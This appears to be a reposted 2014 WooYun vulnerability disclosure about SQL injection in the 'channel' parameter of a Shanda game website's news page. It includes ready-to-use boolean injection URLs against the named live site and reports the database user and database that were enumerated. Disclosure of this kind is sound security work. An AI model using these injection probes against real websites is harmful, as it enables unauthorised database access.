记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

盛大某游戏官网SQL注射

2014-08-15 19:06

0.盛大游戏新贵吹灯官网SQL注射

链接;http://xgui.sdo.com/news/ListNews.aspx?channel=21&page=2

注入点:channel

正常的channel这个点貌似是没注入的,但当修改为channel=19,21时,测试

channel=19,21) and 1=1 and (2=2

channel=19,21) and 1=2 and (2=2

存在注入,估计代码在判断channel的值带逗号时,把值拼接到类似 where channel in (19,21)的SQL里面



http://xgui.sdo.com/news/ListNews.aspx?channel=19,21) and 1=1 and (2=2&page=2

SD1.jpg





http://xgui.sdo.com/news/ListNews.aspx?channel=19,21) and 1=2 and (2=2&page=2

SD2.jpg





1.当前用户与可用数据库

current user:'pt'

SD3.jpg



漏洞证明:

2.数据库mylXgui的表:

SD4.jpg

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2014-066841

阅读:90276 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“盛大某游戏官网SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云